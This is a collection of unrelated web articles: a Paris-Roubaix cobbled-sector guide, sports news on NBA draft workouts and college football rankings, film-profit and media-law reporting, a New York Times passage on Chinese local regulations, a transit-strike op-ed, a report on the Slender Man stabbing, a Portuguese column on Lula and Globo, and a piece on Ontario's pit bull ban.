Interesting section, it starts with a 4% descent and then a long 7% uphill, the steepest of the cobbled secteurs. It was only unearthed from a farmer's field in time for the 2005 race. The dust will be flying here:
[Wikimedia commons: Les Amis de Paris-Roubaix]
21. Aulnoy-lez-Valenciennes - Famars (km 142.5 to 2600 m) *****
The first of two consecutive sectors which are being returned to the race after an absence of... here the info gets a little murky. I'm also a little short on details as to why they rate five stars. But this is probably the first big moment of the race. Still 120km from the velodrome, this secteur kicks off a brutal stretch of four secteurs in quick succession, 8km of stones in 12km of riding.
20. Famars - Quérénaing (km 146 - 1200 m) **
The other returning/mystery secteur.
19. Quérénaing - Maing (km 149 - 2500 m) ***
Up and down a bit. In good condition.
18. Monchaux-sur-Ecaillon (km 152 to 1600 m) ***
Apparently there are some big holes early on, but after that it's more of the same:
[Wikimedia Commons: Les Amis de Paris-Roubaix]
17. Haveluy (km 164 to 2500 m) ****
The "Secteur Bernard Hinault," named after the famous Bretagne who hated this race. Maybe the Haveluiennes named it after him following a night of drunken revelry. Anyway, Pete and I rode it, it's one of the classic dug-out-of-a-field secteur, with a high crown in the middle and cobbles on the perimeter in varying stages of fading back into "field" status. Actually, even the crown is grassy. Anyway, this is where Garmin came a-cropper last year, and between that and our recon I can tell you that the stones are OK but there's plenty of treachery lurking.
16. Arenberg Trench (km 172 to 2400 m) *****
Any questions? Truly one of the greatest scenes in cycling.
Also, the race is most certainly on at this stage. The stones are pretty difficult to deal with; the crown comes and goes; and there are plenty of holes to add a layer of treachery. Whatever riders say about Arenberg (not considered the worst), it does hurt. Of that 2400 meters probably 1500 is slightly uphill on bad stones which keep you on high alert.
15. Millonfosse - Bousiginies (km 178.5 to 1400 m) ***
First time! No pictures seem to exist on the web [Update! They do now], but this secteur could have a deep impact on the race. In past years, the next secteur didn't start until 10km after Arenberg, but this time around riders will have less than 4km to recover before hitting Millonfosse, then another 3.5km before the next double-whammy sector. We make much of this cobble or that sector, but the cumulative effect is what separates out most of the chaff.
14. Brillon a Tilloy-lez-Marchiennes (km 183.5 to 1100 m) ** Tilloy - Sars-et-Rosieres (km 186 to 2400 m) ***
Good god, another 3.5km? By this point in the race the riders might not care about anything less than the four-star, seriously bumpy stuff, which this isn't. You can see some pics here and a video of the second portion here.
13. Beuvry-la-Foret - Orchies (km 192.5 - 1400) ***
The "Secteur Marc Madiot," it consists of 700 meters of unearthed cobbledy madness and 700 meters of new stones, laid down for the race prior to the 2007 edition. You can see a little slideshow of the secteur here.
12. Orchies (km 197.5 to 1700 m) ***
Not banging, but muddy (or dusty) and irregular. Kind of a messy stretch. though no big crown in the middle:
[Wikimedia commons: Les Amis de Paris-Roubaix]
11. Auchy-lez-Orchies - Bersée (km 203.5 to 2600 m) ***
Recent repairs get this secteur a modest rating, but it looks like more dust and pounding to pave. Strategic importance is very high, since it precedes the Mons-en-Pevele secteur by just a few km.
10. Mons-en-Pévèle (km 209 to 3000 m) *****
On the podium of famous secteurs, along with Arenberg and Carrefour de l'Arbe.
[Wikimedia Commons: Les Amis de Paris-Roubaix]
9. Mérignies - Avelin (km 215 to 700 m) **
A mere trifle.
8. Pont-Thibaut (km 218.5 to 1400 m) ***
Dirty, big crown, lots of grass for slippage. Crikey:
[Wikimapia.org]
7. Templeuve l'Epinette (km 224 to 200 m) * Le Moulin de Vertain (km 224.5 to 500 m) **
More classic Paris-Roubaix cobbles, unearthed for the 2002 race and now a fixture in the race. Not bruisers but narrow and slick. Also, the crown is a tad pronounced, making it easy to slide sideways if you're not in position. The good news is that at this point in the race there won't be any peloton to speak of.
[Wikimedia commons]
6. Cysoing - Bourghelles (km 231 to 1300 m) **** Bourghelles - Wannehain (km 233.5 to 1100 m) ***
The Secteur Duclos-LaSalle, it's got a nasty stretch with some holes on the side, but mostly it's comparatively regular and manageable. The crown is pretty mellow, at least.
[Wikimapia.org]
5. Camphin en Pévèle (km 238 to 1800 m) ****
Same old... the last 300 meters get bad.
[Wikimapia.org]
4. Carrefour de l'Arbre (km 241 to 2100 m) *****
This really has to be the worst of it, right? Cobbles are irregular, the crown is a mess, there's mud or dust a-plenty, and the strategic importance is through the roof. Also, check out the puddle to the right. That's a race-ending pothole right there. Maybe even a collarbone if you hit it just right.
[Wikimapia.org]
3. Gruson (km 243 to 1100 m) **
After what's just gone down, this is child's play.
[Wikimapia]
2. Hem (km 250 - 1400 m) **
Least of anyone's problems by now.
1. Roubaix (km 258 to 300 m) *
Some of the coolest cobbles in the world:
But they aren't hard.
Photos by Chris Fontecchio except where otherwise indicated
Chad Ford, NBA Insider for ESPN.com, announced that the Sixers will work out top NBA draft prospects Dante Exum and Andrew Wiggins. According to Ford, Andrew Wiggins will work out for the Sixers next weekend, with Dante Exum also working out for the Sixers next week. Ford is reporting that, as of now, Exum is unlikely to work out for any team besides the Cavaliers, Bucks, Sixers, or Magic.
Source: Dante Exum begins team workouts. Bucks up 1st this weekend, followed by Sixers & Magic next week — Chad Ford (@chadfordinsider) June 9, 2014
Exum has only scheduled MIL, PHI & ORL. Unlikely to workout below 4 I'm told RT @davidjsmith1232: Any word of a workout with the Jazz? — Chad Ford (@chadfordinsider) June 9, 2014
Correction: Andrew Wiggins will work out for Bucks in Santa Barbara THIS week followed by Sixers next weekend — Chad Ford (@chadfordinsider) June 9, 2014
The Exum news is slightly interesting. There had been rumors about his desire to play for the Lakers, who own 7th pick. He has also stated that he views himself as a point guard which, despite Exum stating at the combine that many teams are looking at putting him in a two ballhandler set, has caused some to fear that he wouldn't be willing to play for a team that already has Michael Carter-Williams. It may simply be hubris, perhaps what his agent is hearing now will change by June 26th and he will be forced to work out for teams farther down the draft, or perhaps he will work out for other teams in private and is simply trying to control his own hype. Regardless, it's an interesting bit of news 2+ weeks before the draft.
Andrew Wiggins went #2 in the LibertyBallers staff mock draft, with Exum going 4th. Exum was also ranked 4th in the community big board, but this time Andrew Wiggins took the top slot.
As is usual with the Sixers, media will not be invited to these workouts, so there will be no reports on how the workouts went, and no video or interviews with either the prospects or anybody from the team.
Yesterday I had my first book review published on Amazon. It is of a “Norwegian” Kindle edition of Jame Joyce's Dubliners.
“Norwegian” because it is no translation at all. Someone simply took an online text and ran it through Google Translate. And they did so in a bunch of languages, among them French, Spanish, Danish and Finnish. The name of the “translator” changes on some “editions”, but the cover remains the same:
The book is still there, though my review had to be accepted before publication. I have reported the book to Amazon, so it might not hang around for long. But while it does, don't buy it. I asked for a preview, and lost no money myself.
Still, a swindle is a swindle
_____
Update: The translator, A.P. Notche, has been rather busy lately. There are 799 hits on Amazon.com for a search on his name. He's rather multilingual too.
Aereo, the service that captures free over-the-air TV broadcasts and streams them online for $12 a month, has come under fire from just about every major TV content provider, from local and national networks to the National Association of Broadcasters. This Wednesday, several of them filed statements seeking a preliminary injunction that would stop Aereo from operating while it deals with the suits against it. So what arguments are NBCUniversal, CBS, Fox, a local ABC affiliate, and others making against Aereo?
"Any economically rational cable operator will use it as leverage in upcoming retransmission negotiations." The biggest complaint about Aereo's service is, unsurprisingly, that it will lead to a kind of tragedy of the commons. If Aereo doesn't pay for service, critics say, why would anyone else want to? "It makes little economic sense for cable systems and satellite broadcasters to continue to pay for NBCU content on a per-subscriber basis," says Matt Bond of NBCUniversal, "when, with a relatively modest investment, they can simply modify their operations to mirror Aereo's 'individual antenna' scheme and retransmit, for free, over-the-air local broadcast programming." In other words, they could use the same setup as Aereo, capturing broadcasts over a "tiny antenna" for each customer, and get around paying to include local channels in their packages.
While a single company serving one US market probably won't have as great an impact as these complaints suggest, Bond and others say that cable providers may already be looking for ways to lower costs in the wake of Aereo. "Any economically rational cable operator (or satellite company)," remarks Bond, "will use [Aereo] as leverage in upcoming retransmission negotiations," and Fox's Sherry Brennan says "it is my understanding that cable companies have already referenced Aereo when discussing lowering their retransmission fees."
Nielsen ratings and demographics, which play a role in advertising sales, are also a potential problem, networks say. Since Nielsen "does not report the number or the demographics of web-based viewing," Fox and others have complained that they won't be able to woo advertisers with solid data. Martin Franks of CBS says that it's not "impossible to develop alternate ways to measure viewership," but that these methods are not accepted by advertisers. Still, several networks have circumvented the problem for their own Dyle mobile TV service, and it's not clear that companies have seriously examined any of these alternate methods. "It will completely undermine the ability of content owners to decide the ways they wish to distribute copyrighted television programming."
Beyond that, there is the question of copyright. Leaving aside the potential "viral infringement" that nearly every network mentions, Aereo is retransmitting content without licensing it, even if the content is available for free, and people like NBCUniversal Senior VP Salil Dalvi argue that it would "completely undermine the ability of content owners to decide the ways they wish to distribute copyrighted television programming over mobile platforms." Some of the scenarios that are paint, however, don't seem all that likely. Brennan argues that "there is nothing preventing Aereo from preempting Fox programming, from replacing Fox ads... adding banner ads around the programming, or from inserting content into (or removing content from) the stream" when it retransmits the broadcasts and later worries that it could even resell the broadcasts to cable companies.
Even if Aereo were attempting to license the broadcasts, networks don't seem likely to go along. The statements repeatedly invoke the fear of Aereo leading viewers to "cut the cord," or of online viewing making piracy inherently easier. Networks' own online streaming services like Fox.com or Hulu (Dyle is actually transmitted through a separate radio signal, not the internet) only offer content after an enforced waiting period. Though live TV apps exist for current cable subscribers, CBS, for example, says that offering such streaming on its own would "cannibalize... the core of its business: free, over-the-air delivery of its broadcasts." Viewers are clearly interested in apps and online streaming, but for content providers, this consumer response may not be enough to outweigh what they see as a proposition with high risks and low rewards.
COLUMBUS, Ohio -- Eleven thoughts on the latest College Football Playoff poll, which saw the entire top seven stay the same from the week before, with No. 1 Alabama, No. 2 Oregon, No. 3 Florida State, No. 4 Mississippi State, No. 5 TCU, No. 6 Ohio State and No. 7 Baylor.
1. Ohio State is officially the most interesting team in the rankings. ESPN devoted a big chunk of its show to figuring out how the the Buckeyes fit in now and should fit in if they win out.
The greatest debate in college football is the balance between how the Buckeyes are playing in the last two months vs. the Virginia Tech loss vs. the overall strength of their schedule in the Big Ten. Ohio State is the lynchpin of the playoff at the moment. The debate any more really isn't who will be No. 4.
It's whether Ohio State gets in or not.
2. Ohio State's win over Indiana, in which the Buckeyes were trailing deep into the third quarter, wasn't impressive, and the committee noticed. But, basically, Baylor's win over Oklahoma State wasn't enough to have the Bears jump the Buckeyes.
"That was a win that was good enough to keep them ranked at their current spot," College Football Playoff selection committee chair Jeff Long said of the Buckeyes on a conference call with reporters. "We are certainly aware of the fact it was a win over a sub-.500 team."
3. Minnesota may be the second-most interesting team in the poll. The Golden Gophers were No. 25 when they played Ohio State, lost at home, and stayed No. 25. Now they moved to No. 18 with a win over Nebraska.
At 8-3, they have losses to No. 5 TCU, No. 6 Ohio State and Illinois, which is not a good team. And the Gophers don't have a win over a current top 25 team.
At 8-3, Ole Miss is the only team to beat No. 1 Alabama, and the Rebels have losses to No. 15 Auburn, LSU and Arkansas. I know LSU and Arkansas are the bottom two teams in the SEC West, and I know Ole Miss has lost three of four.
But Ole Miss beat Alabama. I don't get Ole Miss at No. 19 behind the Gophers.
4. But, Minnesota moving up is good for both Ohio State and TCU. Both teams beat the Gophers, but I asked Long on the conference call how the committee might compare those wins.
TCU won at home against Minnesota, 30-7, in week three. Ohio State won on the road at Minnesota, 31-24, in week 12.
"Common opponents are something we look at," Long said, before adding his caveat that it's just part of a body of work. "They fact they are a common opponent gives us a reference point. Margin of victory is not something that factors in. We are aware of it, but it's not a determining factor."
The committee does seem to take road games into more account than home games, though. So ... it may be fair to assume that Ohio State gets as much credit for its Minnesota win as TCU does.
5. Minnesota ahead of Ole Miss is also good for Ohio State. Mississippi State is playing at Ole Miss on Saturday, but the Buckeyes already beat the Gophers. It seems like an indication that the Buckeyes will eventually pass No. 4 Mississippi State if they keep winning.
6. Rivalry weekend is coming for everyone. And the committee will take that into account. If Ohio State doesn't dominate 5-6 Michigan, or Florida State doesn't throttle 6-4 Florida, the committee gets it.
"I think everyone in that room understands rivalry games are special," Long said. "We do know there have been a number of unexpected outcomes in rivalry games."
7. But what matters is the context against the other contenders. So if TCU destroys 6-5 Texas on the road while Ohio State struggles, that can matter.
8. Some people are getting hung up on Long's words each week on ESPN and in the conference call that follows with reporters, and using them to claim that the committee shouldn't be doing these rankings or that the weekly are damaging the process for the final rankings.
I think the process is fine. I think explaining it is hard.
Long is speaking as one voice on behalf of 12 people who all judge things in different ways. Each week he is certainly backing positions that he himself may not support. For all we know, he's voting Florida State No. 1 on his personal ballot each week then having to come out and explain why the undefeated Seminoles are only No. 3.
Trust the committee process. It's common sense and collaborative and yes, a little messy. But it's harder to talk about than it is to execute.
9. Long was asked about bad losses, with Alabama's loss to Ole Miss and Ohio State's loss to Virginia Tech the two losses mentioned specifically in the question. In the process of the answer, Long said, "I'm not sure I would agree with the ones that you listed there," and reporters took that to mean he didn't think Virginia Tech was a bad loss.
Virginia Tech is 5-6 and in last place in the ACC Coastal Division. Ole Miss is 8-3, ranked No. 19, and tied for third in the SEC West, the toughest conference in football.
I think Long was not agreeing with Ole Miss as a bad loss with his statement. Really, it's not a bad loss.
I think Virginia Tech was just lumped in. The way the committee has talked about that loss all year, and the fact that Virginia Tech just lost to Wake Forest 6-3 in double overtime - yes, that still is a bad loss.
Again, people are getting caught up on exactly what he said in a rushed conference call instead of what he logically meant. I don't think Virginia Tech has been washed away yet when it comes to evaluating Ohio State.
10. The good news for undefeated Marshall is that it finally entered the top 25 at No. 24. The bad news is that Boise State entered at No. 23. Those teams are fighting to be the highest-ranked team from a non-power conference, which comes with a spot in one of the four most prestigious bowls after the two playoff semifinals.
Long said 9-2 Boise State got the nod off a much better strength of schedule than 11-0 Marshall. While Boise's schedule strength will improve, Marshall's won't.
If Boise State doesn't lose, Marshall won't make it.
11. The more it's discussed, the more complicated it sounds. But the committee is working. And the weekly rankings are fun.
When it comes to evaluating the financial performance of top movies, it isn't about what a film grosses at the box office. The true tale is told when production budgets, P&A, talent participations and other costs collide with box office grosses, and ancillary revenues from VOD to DVD and TV. To get close to that mysterious end of the equation, Deadline is repeating our Most Valuable Blockbuster tournament, using data culled by seasoned and trusted sources. We're counting down from No. 20 and will present the data en masse Monday.
GODZILLA
THE FILM: The oversized reptile was brought roaring back into the studio blockbuster game by Thomas Tull's Legendary Pictures. By the time the film came out, it turned out to be the final deal under a Legendary pact that paid a distribution fee around 8% to Warner Bros. The film came out with a roar, grossing $93.2 million its opening weekend last May. It was the first big film featuring Bryan Cranston, as he was hauling in just about every award for his run on Breaking Bad. Of course, when you hire a TV stalwart to anchor a $160M-budget film, that means you are not paying big bucks in actor participation, because the concept is the real star. How did that factor into Legendary's revenue haul?
THE BOX SCORE: Here are the costs and revenues as our experts see them:
THE BOTTOM LINE: Another film that had billion-dollar aspirations because of the global brand awareness of Toho's title character, but fell short. It certainly did better than the 1998 Roland Emmerich-directed reptile revival film for Sony, which was considered a disappointment. That Godzilla opened on a Wednesday making $62.6M in five days and grossed $379M worldwide and $136.3M stateside, on a $130 million budget. Legendary's Godzilla did better for its $160 million production budget, grossing $528.7M worldwide, including China. Participation costs were minimal, but where Legendary got dinged was in the distribution fee it paid to former partner Warner Bros. According to our tally here, the film turned in a net profit just north of $92.3M. Subtract Warner Bros' distribution fee of $39.8M, and that left a $52.477M net. Warner Bros co-financed 25% of the film, so it gets one-quarter of that fee, too, proving it's always better to be the studio (Warner Bros makes $52.9M). Legendary ends up with $39.35 million in net profits. The cash-on-cash return is 1.12 — and Legendary likes these numbers enough to go ahead with a second installment, which, moves to its new partner, Universal. Not factored here is the ongoing legal dispute between Legendary and producers Roy Lee and Dan Lin, who were dropped from the producing roster and sued.
No. 20 – Interstellar
No. 18 – The Amazing Spider-Man 2
Officials of Hanchuan, a city in Hubei Province, tried a similar ploy, with the same effect. Determined to boost the local brand of baijiu, a sinus-clearing distilled clear liquor, they ordered state workers to buy a total of about $300,000 worth in a year. Reporters calculated that each employee would have had to buy three bottles a day to meet the quota. The rule was later rescinded.
Another county in Guizhou Province in southern China compelled state workers last year to help inflate the number of tourists visiting the ruins of an ancient village. Every government office was ordered to organize field trips to the site so the county could report 5,000 visitors within two months.
The involuntary visitors had to take several buses to get to a village 20 miles from the county seat. From there, they hired motorcycles to carry them another nine miles down dirt roads, the newspaper Guangzhou Daily reported.
The Guizhou Commercial News reported that some government offices were left unattended while state employees served as tourists. The next month that order, too, was repealed.
But a 2003 regulation that bars male officials in Sichuan Province from hiring female secretaries may still be on the books. China Youth Daily reported then that the official who initiated the regulation wanted “to ensure that work can be carried out.”
An official in the Communist Party's provincial office said in an interview that she was not aware of a written rule.
No one ever precisely pinned down the origin of an order this May to kill all dogs in the town of Heihe, on the Russian border in the far northeast. Media reports suggested one town official became irate after a dog bit him as he strolled along a river. But the official refused to confirm that.
Newsletter Sign Up Continue reading the main story Please verify you're not a robot by clicking the box. Invalid email address. Please re-enter. You must select a newsletter to subscribe to. Sign Up You will receive emails containing news content , updates and promotions from The New York Times. You may opt out at any time. You agree to receive occasional updates and special offers for The New York Times's products and services. Thank you for subscribing. An error has occurred. Please try again later. View all New York Times newsletters.
Town leaders organized teams of police officers and ordered them to beat to death any dog who ventured into a public space. China National Radio, a state-run agency, broadcast the citizens' outrage. “When we need to walk our dogs now, we have to first go out and look for cops,” one dog owner lamented.
Advertisement Continue reading the main story
Scholars say the proliferation of such regulations stems from a lack of professionalism among some local officials.
The Communist Party has been trying in recent years to correct these problems by providing better training and more channels for public feedback. Party schools that groom officials now stress administrative skills as well as ideology. Job evaluations are supposed to be based on concrete results.
Some local officials who used regulations to bilk the public have been dealt with harshly. The party secretary of Feicheng, a town in northeastern China, was fired after imposing a fine of $73 on any farmer who cut down a corn stalk without a license. Farmers complained that they could not harvest their corn without fear of being penalized.
Officials of China's 637,001 villages seem especially prone to excess regulatory zeal. Until being overruled by higher-ups in 2005, for instance, officials of a village in Chongqing forced unmarried women to pass a chastity test before receiving compensation for farmland appropriated by the government. They argued that only virgins deserved compensation.
In comparison, Huangping County's policy of roadside salutes is arguably benign. Education officials say compliance is strictly voluntary. Asked whether they follow it, elementary students here tend to burst into nervous giggles.
The rule's purpose is twofold: to keep children safer on the county's corkscrew mountain roads and to teach manners. Nearly 30 schools are located along roads without sidewalks or speed bumps. Signs posting speed limits are few and far between; virtually no signs indicate a school nearby.
Long Guoping, deputy chief of the county education bureau, said those measures were coming. “Little by little, the government is installing them,” he said. In the meantime, the salute “might avoid some accidents,” he said. “It allows the drivers to notice the children and the children to notice the drivers.”
Luo Rongmei, who teaches first grade at Luolang Elementary School, is all for it. “Since they started saluting there has not been one traffic accident,” she said, as the students ran and shouted in the yard.
Guo Yuozhang, 63, whose grandson attends the Luolang school, said he was more ambivalent. If the cars come from one direction, “that is not too bad,” said.
Advertisement Continue reading the main story
Cars coming in both directions is a bigger hassle. “Sometimes they are just turning in circles and they get kind of stuck,” he said. He spun around to illustrate the point, smiling slyly.
As the BART labor dispute intensified last weekend, the Bay Area News Group reported that calls for a ban on transit strikes were picking up steam. East Bay state Senator Mark DeSaulnier, a prominent Democrat in California politics, said he was considering legislation that would prohibit transit strikes and replace them with binding arbitration. And Steve Glazer, an Orinda councilman and political consultant to Governor Jerry Brown, is mounting a campaign for the Assembly on the issue of banning transit strikes. It's possible that the settlement of the BART labor dispute earlier this week will quell the calls for transit strike bans. And if that happens, let's hope it continues, because outlawing transit strikes is a bad idea for Democrats.
That's especially true in the era of Citizens United. The 2010 US Supreme Court decision opened the floodgates for corporate cash in politics. And much of that money has flowed toward the Republican Party ever since. The billionaire ultra-conservative Koch Brothers have the LED the way, pumping hundreds of millions of dollars into the Tea Party as well as efforts to defeat President Obama and the Democratic Party. As a result, unions are now more important than ever for Democrats. And any attempts to weaken the influence of labor in California or the nation plays right into the hands of the GOP.
It should come as no surprise that besides Glazer and DeSaulnier, Republicans in the California legislature have been the leading advocates for banning transit strikes in the state. The GOP knows full well how important labor is to the Democrats. After all, unions not only help bankroll Democratic candidates, but they also provide much-needed ground support for campaigns — operating phone banks, knocking on doors, and leading get-out-the-vote efforts on Election Day.
Smart Democrats know this, too. It's probably why Governor Brown and state Democratic Senate Leader Darrell Steinberg sounded cool to the idea of outlawing transit strikes. They know that organized labor would not take kindly to any sort of strike ban. The reason is simple: Strikes are the most important tool in any union's arsenal. In fact, without strikes — or the threat of them — it's safe to say that labor would have made no progress in improving working conditions for middle-class Americans during the past century.
Moreover, as key components of the Democratic Party, labor unions help spread the progressive agenda and keep it viable. Without unions — or with a weakened labor movement — Democrats would have a much tougher time pushing for fair tax rates, environmental protections, civil rights, and better educational opportunities for middle- and low-income students, while maintaining the social safety net at the same time. It's no secret that Brown's tax measure — Proposition 30 — would not have passed last year without the huge support it received from organized labor.
Yet, to a certain extent, many progressive-minded people take unions for granted — or view them as being antiquated. But that's a mistake. Yes, transit strikes are incredibly inconvenient. But in the big picture, they're a relatively small price to pay for achieving what Democrats hold so dear.
The Unions Were Right
Last Saturday's fatal, tragic BART crash, which killed two workers, provided strong evidence that union officials were right all along about two major aspects of the labor dispute: It takes considerable skill and training to be a BART train driver and that BART workers sometimes toil in dangerous conditions. Moreover, union members were right to warn before the most recent strike that BART managers should not attempt to drive trains in the event of a shutdown, because it's too risky.
Federal investigators said Monday that a trainee was operating the train that struck and killed two workers who were inspecting the tracks between the Walnut Creek and Pleasant Hill stations. The Contra Costa Times reported that it was the sixth and seventh fatalities involving BART employees in the transit agency's history.
Although it might be several days before federal investigators determine exactly what happened in the crash, it seems clear from what has been reported so far that some opponents of the BART unions were woefully wrong about key issues in this year's labor dispute. For months, some critics of the BART unions contended that the transit agency's workers are unskilled, overpaid, and undeserving of raises. Some even went so far as to suggest that BART workers who went on strike should be fired and replaced.
But Saturday's fatalities revealed that such arguments were bogus — particularly when it comes to BART train drivers. The crash made it clear that train operators hold important jobs that require training and skill. After all, the agency's drivers hold the lives of hundreds of thousands of people in their hands each day. And this fact should have been obvious all along.
Indeed, over the years, BART drivers have put together an impressive safety record. BART train accidents are extremely rare. And this reality "isn't based on luck, but the experience and skill of its workforce," Patricia Schuchardt, a BART employee and member of AFSCME — one of the unions that did not strike — wrote in an op-ed last month in the CoCo Times.
In addition, Saturday's crash provided strong evidence that attempts by BART management to unilaterally alter employee work schedules — particularly for train operators and communications employees — were wrongheaded. In fact, the unions repeatedly warned before the crash about the safety issues related to changing such rules.
Rescue workers take a stabbing victim to the ambulance in Waukesha, Wis. (Photo: Abe Van Dyke, AP)
Two 12-year-old Wisconsin girls were charged as adults Monday for allegedly stabbing a friend 19 times after acting out bizarre instructions from an Internet site featuring horror stories, authorities said.
Morgan Geyser and Anissa Weier are being held for attempted first-degree intentional homicide over the Saturday morning attack in woods in the southeastern Wisconsin city of Waukesha.
The unidentified 12-year-old victim was fighting for her life in a hospital Monday, the Milwaukee Journal Sentinel reported.
According to the criminal complaint, one girl held the victim down and the other stabbed her in the torso, legs and arms, intending to kill her to become "proxies" of a character on the site Creepypasta Wiki, which posts short stories "designed to unnerve and shock the reader."
SLENDERMAN: Mythical character at center of girl's stabbing
Despite her injuries, the victim crawled to a road, where a bicyclist found her. Police apprehended the two suspects Saturday afternoon and recovered a knife apparently used in the attack.
"Creepypasta" derives from the Internet slang "copypasta," a text block copied and pasted repeatedly on numerous websites. Its formulaic stories often include anecdotes, rituals or lost episodes of TV shows.
Graffiti of the fictional character Slender Man drawn on a street in Raleigh, N.C. (Photo: mdl70/Wikipedia)
Rituals include a "list of instructions for the reader, claiming that if they go to a certain place at a certain time, and perform specific actions, something remarkable and/or horrifying will happen," the site says.
Weier told investigators that she introduced Geyser to the site in December, and that Geyser later decided they needed to kill someone to prove they were worthy of "Slenderman," the alleged leader of Creepypasta.
The pair decided to carry out the attack on May 30, Geyser's birthday, and then visit "Slender" at his mansion in the Nicolet National Forest to prove he existed.
"As the details became more apparent, it's extremely disturbing as a parent and as a chief of police, especially with the age of the suspects and being female," said Police Chief Russell Jack. "This is a very disturbing investigation."
He called it "a wake-up call for parents" to monitor their children's Internet use.
Members of Geyser's family sobbed several times during her court appearance.
"The family is very horrified at what has happened," attorney Donna Kuchler said.
Read or Share this story: http://usat.ly/1mKE7hv
Arnaldo César (*)
Colocar Lula atrás das grades é uma obsessão não só do juiz Sérgio, mas também – e prioritariamente – das Organizações Globo. A delação fajuta do empreiteiro Leo Pinheiro, da OAS, vem ocupando espaços preciosos nos principais telejornais do conglomerado da família Marinho. Entre os dias 19 e 22, o PT e o ex-presidente mereceram quase três horas na programação global.
O massacre não se limitou aos meios eletrônicos, o jornal O Globo, na edição de sábado (dia 22), cravou em um editorial de meia página que “Lula é o chefe” de uma organização criminosa.
As tênues evidências apresentadas pelo delator Pinheiro foram apontadas como provas absolutas no jornalão dos Marinhos. São: o registro de que um carro do “Instituto Lula” teria se deslocado seis vezes, entre os anos de 2012 e 2014, ao Guarujá (cidade onde foi construído o tal tríplex) e a agenda pessoal do empreiteiro, na qual foram anotados encontros dele com o ex-presidente e seus familiares.
Qual a razão de tamanho massacre? Impedi-lo de voltar nos braços do povo em 2018? Talvez, essa não seja a única razão. Para entendermos o que está sendo jogado neste tabuleiro de delações e vazamentos é preciso dar um pouco mais de atenção ao movimento feito pelo ex-ministro Antônio Palocci no depoimento que prestou ao juiz Moro, no último dia 20.
Sem pedir qualquer benefício da delação premiada, ele se prontificou em fazer novas revelações de como se processaram as contribuições de campanhas de outras empresas através do chamado “caixa 2”. Presume-se que ele estaria pretendendo falar como o sistema financeiro costuma se relacionar com os partidos políticos. Mas, não é só isso.
Palocci e muita gente boa que passou pelo Ministério da Fazenda e pelo BNDES sabem como os Marinhos conduziram negociações que os salvaram da bancarrota, no início dos anos 2000. Em 31 de marco de 2002 o balanço divulgado pelas Organizações Globo (Globopar) acusou uma dívida externa do grupo de 2,6 bilhões de dólares. Dos quais 2,2 bilhões em moedas estrangeiras.
O editor Mauricio Dias, numa reportagem publicada sobre a portentosa dívida dos Marinhos, na primeira semana de novembro de 2002, na revista “Carta Capital” – “Vênus Endividada” -, anotou um episódio hilário e enigmático ocorrido naquela época. O desavisado apresentador Fausto Silva no seu programa dominical deixou escapar que a crise na Globo era tamanha que “estamos usando papel higiênico dos dois lados”.
O Sistema Globo que sempre se posicionou fortemente contra qualquer tipo de moratória, chegou a suspender o pagamento das suas dívidas por 90 dias. O que gerou, na época, pressões fortíssimas por parte de seus credores nos Estados Unidos. As agências internacionais de classificação – como a Standard & Poor – reduziram a nota da Globo de “B” para “CC”. Ou seja, devedor de alto risco.
Para sair do buraco e se livrar dos tribunais norte-americanos onde foi impiedosamente processada por seus credores, a Globo contou com o ombro amigo do governo federal – e, em especial do BNDES – que lhe emprestou a juros de pai para filho mais de US$ 1,3 bilhão. Operações iniciadas no mandato de Fernando Henrique Cardoso e concluídas na era Lula.
No seu depoimento ao juiz Moro, Palocci deixou uma frase solta que os leigos não entenderam muito bem. “Às vezes, os governos são obrigados a ajudar empresas a se recuperarem”.
Será que o “Verdugo de Curitiba” estaria interessado em ouvir o que Palocci teria a revelar da maneira como a sua grande aliada – a Globo – conseguiu sair do atoleiro financeiro com préstimos públicos?
Neste texto, não estamos nem tratando do rumoroso caso de marotas operações contábeis praticadas, em 2009, pela Globo no qual um débito fiscal de mais R$ 2 bilhões se transfou em créditos de R$ 300 milhões. Uma confusão tão cabeluda que registra até o desaparecimento do processo na Receita Federal.
Impedir que um notório inimigo (já deixou de ser adversário) chegue ao poder em 2018, parece virou um caso de vida ou morte para a família Marinho. O popular “interesse nacional” que vá às favas!
A verdade é que a prática vergonhosa do “lawfare” (uso da Justiça com objetivos políticos) e a manipulação escandalosa da informação pela grande mídia não estão conseguindo, no Brasil, produzir os efeitos desejados. Lula, para desespero geral, tem crescido nas intenções de voto para a campanha presidencial de 2018.
O cidadão que revela que votará no ex-presidente no ano que vem também brada pela moralização do País. Dá a impressão de ser um contrassenso. Mas, não é. Para sorte de Lula, a formação da opinião pública no País – e no resto do mundo – já não segue os primados do século passado. Tanto os meios eletrônicos quanto os impressos vêm perdendo audiência, credibilidade e robustez financeira. A Internet se encarregou de tomar isto deles.
Os exaustivos 32 minutos diários de ataques ao Lula no “Jornal Nacional” ou os furibundos editoriais em “O Globo” têm conseguido repercussão entre aqueles que sempre foram contra o PT e tudo que se declare de esquerda.
Só ampliarão sua penetração quando passarem a fazer jornalismo de verdade. Alimentar-se sempre de vazamentos dados na boca pelos procuradores e pelo juiz Moro não é jornalismo. Chama-se: “correia de transmissão”.
Golpes de manchetes e editoriais raivosos não serão suficientes para transformar Lula em réu. Monocraticamente, o juiz Moro terá que prestar esse favor aos seus padrinhos do PSDB e da Globo. Nem que para isso também mande às favas a imparcialidade e a verdade.
P.S: Para quem quiser ter mais detalhes sobre as agruras globais na área financeira aqui vai o link da deliciosa matéria publicada, em 2002, por Mauricio Dias, na Carta Capital: “Vênus Endividada”
(*) Arnaldo César é jornalista e colaborador do Blog
Nicole Thompson , The Canadian Press
As Quebec municipalities plan bans on pit bulls in the wake of a horrific fatal attack in Montreal, they might naturally turn to Ontario for guidance given the province imposed its own ban on the dogs more than a decade ago.
But they won't get any data.
The province still doesn't know whether the ban actually reduced dog bites because data isn't collected at the provincial level, nor does Ontario regulate how -- or even whether -- municipalities collect and store the information.
Ontario banned pit bull ownership provincewide in a 2005 amendment to the Dog Owners Liability Act, to much opposition from some dog-lovers.
The ban made it mandatory for all pit bulls already in the province to be spayed or neutered, and leashed and muzzled in public. The ultimate goal was to remove pit bulls from the province altogether by preventing them from breeding, and to keep new pit bulls out of Ontario.
Public Health Ontario is mandated to collect data on animal bites that could be linked to the spread of rabies, but they don't collect general dog bite numbers, a representative said.
So data collection is done at the municipal level.
In some Ontario cities, data is collected by animal services. In others, it's collected by public health. In Toronto, the methods of collecting dog bite data changed after the pit bull ban, so comparing statistics before and after is impossible.
Just east of Toronto in Pickering, Ont., dog bites can be reported to both public health and animal services, said an official from the community's animal services department.
